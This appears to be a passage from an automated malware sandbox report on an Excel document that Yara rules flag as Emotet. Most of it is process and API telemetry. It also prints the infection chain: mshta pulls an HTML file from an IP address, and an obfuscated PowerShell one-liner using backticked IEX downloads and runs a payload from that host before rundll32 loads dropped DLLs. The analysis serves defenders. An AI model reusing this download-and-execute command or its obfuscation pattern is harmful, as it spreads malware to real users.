                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100134F0 IsIconic,12_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,12_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 1976Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_12-32090
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,12_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694087 mov eax, dword ptr fs:[00000030h]9_2_00694087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]10_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h]12_2_001C4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00234087 mov eax, dword ptr fs:[00000030h]13_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314087 mov eax, dword ptr fs:[00000030h]14_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00404087 mov eax, dword ptr fs:[00000030h]15_2_00404087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,12_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,12_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVvJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: CJ68000754184.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,12_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,12_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,12_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
